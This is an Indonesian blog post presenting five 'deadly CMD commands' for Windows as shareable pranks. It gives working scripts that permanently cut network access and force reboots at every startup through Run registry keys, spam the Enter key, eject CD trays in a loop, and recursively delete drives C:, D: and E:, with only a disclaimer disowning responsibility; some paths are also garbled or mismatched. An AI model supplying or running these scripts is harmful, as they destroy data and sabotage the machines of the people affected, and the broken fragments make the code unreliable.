Jangan lupa di Share ya Guys!! Supaya teman dan orang lain tau tentang ini!!
Ok, langsung saja BINUSTEKNOLOGI7 memberi tau PERINTAH CMD YANG MEMATIKAN(2)
1. DISABLE INTERNET PERMANTLY
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v
WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v
CONTROLexit /t reg_sz /d c:windowswmin32.bat /f
PAUSE
2.ENDLESS "ENTER"
Set wshShell=wscript.CreateObject("WScript.Shell")
do
Wscript.sleep 100
wshshell.sendkeys"~(enter)"
loop
3.SHUTDOWN PC WHEN STARTUP
echo @echo off>c: windowshartlell.bat
echo break off>>c: windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>> c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
PAUSE
4.POPPING CD DRIVES
Set oWMP=CreateObject("WMPlayer.OCX.7")
Set colCDROMs=oWMP.cdromCollection
do
if colCDROMs.count>=1 then
For i=0 to colCDROMs.count -1
colCDROMs.Item(i).Eject
Next
For i=0 to colCDROMs.count -1
colCDROMs.item(i).Eject
Next
End If
wscript.sleep 100
loop
5.FORMAT DRIVES
rd/s/q D:\
rd/s/q C:\
rd/s/q E:\
Ok, Guys!! Gimana PERINTAH CMD YANG MEMATIKAN? Keren bukan? dari part1 sampai part2 itu jangan dipraktekann sembarangan Yah Guys!! Karna jika ada yang aneh BINUSTEKNOLOGI7 tidak bertanggung jawab, Praktek lah pada tempatnya.😀
Jika ada yang kurang paham atau memberikan saran, silahkan komen dibawah yah Guys! Jangan lupa Share ini biar banyak yang tahu.
Ok ,Trimakasih..